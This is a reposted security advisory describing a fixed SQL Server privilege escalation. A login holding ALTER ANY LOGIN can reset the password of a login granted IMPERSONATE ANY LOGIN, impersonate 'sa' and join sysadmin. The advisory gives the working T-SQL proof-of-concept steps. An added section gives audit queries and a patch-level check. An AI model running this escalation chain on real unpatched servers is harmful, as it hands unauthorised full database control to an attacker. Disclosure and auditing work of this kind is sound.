MSSQL Database Privilege Elevation From ALTER ANY LOGIN To SYSADMIN
Microsoft SQL Server has a privilege elevation issue: a login holding the "ALTER ANY LOGIN" permission can reset the password of a login that holds "IMPERSONATE ANY LOGIN" and, through it, obtain the SYSADMIN role. The issue affects SQL Server 2016 through 2022 and has been fixed by a Microsoft security update. 2025-8-20 19:35:54 Author: cxsecurity.com (view original)


Title: MSSQL Database Privilege Elevation From ALTER ANY LOGIN To SYSADMIN
Product: Microsoft SQL Server
Vendor: Microsoft
Affected Version(s): SQL Server 2016, 2017, 2019, 2022
Tested Version(s): SQL Server 2016, 2017, 2019, 2022
Fixed Build Versions: 16.0.4210.1, 16.0.1145.1, 15.0.4440.1, 15.0.2140.1, 14.0.3500.1, 14.0.2080.1, 13.0.7060.1, 13.0.6465.1
Risk Level: Medium
Solution Status: Fixed
CVE Reference: N/A
Author of Advisory: Emad Al-Mousa

*****************************************

Vulnerability Details:

Privilege escalation in Microsoft SQL Server is possible when a login holds the server-level permission "ALTER ANY LOGIN" and any other login has been granted the "IMPERSONATE ANY LOGIN" permission directly. The login holding "ALTER ANY LOGIN" can reset the password of the login holding "IMPERSONATE ANY LOGIN", connect as that login, impersonate "sa" and add its own primary login to the SYSADMIN fixed server role.

By design, a login with "ALTER ANY LOGIN" cannot change the password of the built-in "sa" account, nor of logins granted "CONTROL SERVER" or belonging to the "sysadmin" or "securityadmin" roles; this is the protection mechanism against privilege elevation attacks of exactly this kind. Before the August 2025 security update, logins holding only "IMPERSONATE ANY LOGIN" were not covered by that check, even though the permission allows EXECUTE AS LOGIN for any login, "sa" included.

*****************************************

Proof of Concept (PoC):

First, create a dummy login called "kit" and grant it the ALTER ANY LOGIN permission:

USE [master]
GO
CREATE LOGIN [kit] WITH PASSWORD=N'kit123', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO
USE [master]
GO
GRANT ALTER ANY LOGIN TO [kit]
GO

Connected to the SQL Server instance as "kit", I then search for any login that has been granted the "IMPERSONATE ANY LOGIN" permission, with the aim of escalating my permissions.

For the PoC, two logins with impersonation capability are created: test1 is granted "IMPERSONATE ANY LOGIN" explicitly, and test2 is granted "CONTROL SERVER", which implicitly includes the impersonation permission:

USE [master]
GO
CREATE LOGIN [test1] WITH PASSWORD=N'test1', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO
GRANT IMPERSONATE ANY LOGIN TO [test1]
GO

-- CONTROL SERVER implicitly includes the impersonation permission
USE [master]
GO
CREATE LOGIN [test2] WITH PASSWORD=N'test2', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
GO
GRANT CONTROL SERVER TO [test2]
GO

As the "kit" login, I try to change the password of both test1 and test2:

USE [master]
GO
ALTER LOGIN [test1] WITH PASSWORD=N'emad@2025'
GO
USE [master]
GO
ALTER LOGIN [test2] WITH PASSWORD=N'emad@2025'
GO

The password change succeeds only for the login that is explicitly granted "IMPERSONATE ANY LOGIN" (test1). It fails, as expected and by design, for logins granted "CONTROL SERVER", "sysadmin" or "securityadmin", and for the "sa" account.

After resetting test1's password, connect to the instance as test1, impersonate "sa" and add "kit" to the sysadmin role:

EXECUTE AS LOGIN = 'sa'
ALTER SERVER ROLE [sysadmin] ADD MEMBER [kit]
GO

Now apply the Microsoft security update released in August 2025 (KB5063756) and repeat the password change as "kit":

USE [master]
GO
ALTER LOGIN [test1] WITH PASSWORD=N'hot_summer@2025'
GO

On the patched build it is blocked with the error:

Msg 15151, Level 16, State 1, Line 3
Cannot alter the login 'test1', because it does not exist or you do not have permission.
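The advisory describes, but does not show, the search the "kit" login performs for logins granted "IMPERSONATE ANY LOGIN". The T-SQL below is an added example, not part of the original advisory or its author's PoC: it implements that search against the real catalog views sys.server_permissions and sys.server_principals, adds the mirror-image audit a DBA would run (who holds ALTER ANY LOGIN without being sysadmin), and checks the instance build against the fixed builds listed in the header. The mapping of build-number ranges to the GDR and CU servicing branches in the @fixed table is this example's own assumption, not something the advisory states; run it in [master] as a sysadmin, since a low-privileged login only sees the catalog rows that metadata visibility allows it to see.

```sql
-- Added example (not from the original advisory). Run in [master] as a
-- sysadmin for a complete view; a low-privileged login such as "kit" sees
-- only the catalog rows that metadata visibility exposes to it.
USE [master];
GO

-- 1. Reset targets: logins granted IMPERSONATE ANY LOGIN directly at server
--    scope. On an unpatched build, a login holding ALTER ANY LOGIN (but not
--    CONTROL SERVER) can run ALTER LOGIN ... WITH PASSWORD against these.
--    Members of sysadmin are excluded because the by-design check already
--    protects them.
SELECT sp.name            AS login_name,
       sp.type_desc,
       sp.is_disabled,
       perm.permission_name,
       perm.state_desc
FROM sys.server_permissions AS perm
JOIN sys.server_principals  AS sp
  ON sp.principal_id = perm.grantee_principal_id
WHERE perm.class = 100                                -- 100 = server securable
  AND perm.permission_name = N'IMPERSONATE ANY LOGIN'
  AND perm.state IN ('G', 'W')                        -- GRANT / GRANT WITH GRANT OPTION
  AND sp.type IN ('S', 'U', 'G')                      -- SQL login, Windows login, Windows group
  AND sp.is_disabled = 0
  AND ISNULL(IS_SRVROLEMEMBER('sysadmin', sp.name), 0) = 0;
GO

-- 2. Attack-capable principals: logins holding ALTER ANY LOGIN that are not
--    already sysadmin (the position "kit" occupies in the PoC).
SELECT sp.name AS login_name,
       perm.permission_name,
       perm.state_desc
FROM sys.server_permissions AS perm
JOIN sys.server_principals  AS sp
  ON sp.principal_id = perm.grantee_principal_id
WHERE perm.class = 100
  AND perm.permission_name = N'ALTER ANY LOGIN'
  AND perm.state IN ('G', 'W')
  AND ISNULL(IS_SRVROLEMEMBER('sysadmin', sp.name), 0) = 0;
GO

-- 3. Build check against the fixed builds in the advisory header.
--    ASSUMPTION of this example: which build-number range belongs to the GDR
--    branch and which to the CU branch of each major version.
DECLARE @fixed TABLE (major INT, branch_min INT, branch_max INT, fixed_build INT);
INSERT INTO @fixed (major, branch_min, branch_max, fixed_build) VALUES
    (16, 1000, 1999, 1145), (16, 4000, 4999, 4210),   -- SQL Server 2022 GDR / CU
    (15, 2000, 2999, 2140), (15, 4000, 4999, 4440),   -- SQL Server 2019 GDR / CU
    (14, 2000, 2999, 2080), (14, 3000, 3999, 3500),   -- SQL Server 2017 GDR / CU
    (13, 6000, 6999, 6465), (13, 7000, 7999, 7060);   -- SQL Server 2016 GDR / CU

DECLARE @ver   NVARCHAR(128) = CAST(SERVERPROPERTY('ProductVersion') AS NVARCHAR(128));
DECLARE @major INT = CAST(PARSENAME(@ver, 4) AS INT);   -- 16 in 16.0.4210.1
DECLARE @build INT = CAST(PARSENAME(@ver, 2) AS INT);   -- 4210 in 16.0.4210.1

SELECT @ver AS product_version,
       CASE
           WHEN EXISTS (SELECT 1 FROM @fixed AS f
                        WHERE f.major = @major
                          AND @build BETWEEN f.branch_min AND f.branch_max
                          AND @build >= f.fixed_build)
               THEN 'patched: at or above the fixed build for this branch'
           WHEN EXISTS (SELECT 1 FROM @fixed AS f WHERE f.major = @major)
               THEN 'UNPATCHED: ALTER ANY LOGIN can still reset IMPERSONATE ANY LOGIN logins'
           ELSE 'version not covered by the advisory'
       END AS status;
GO
```

Any login returned by query 1 together with any login returned by query 2 on an instance reported as UNPATCHED by query 3 is the exact precondition the PoC exploits; the immediate fix is the August 2025 update, and until it is applied the grant of "IMPERSONATE ANY LOGIN" to a standalone login should be treated as equivalent to CONTROL SERVER when reviewing who holds ALTER ANY LOGIN.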

References:

https://databasesecurityninja.wordpress.com/2025/08/13/sql-server-privilege-elevation-escalation-from-alter-any-login-permission-to-sysadmin-role-fixed-in-august-2025-security-update/

https://support.microsoft.com/en-us/topic/kb5063756-description-of-the-security-update-for-sql-server-2022-gdr-august-12-2025-f56e3677-84b7-4ba3-ab13-b33fcfabb212


Source: https://cxsecurity.com/issue/WLB-2025080019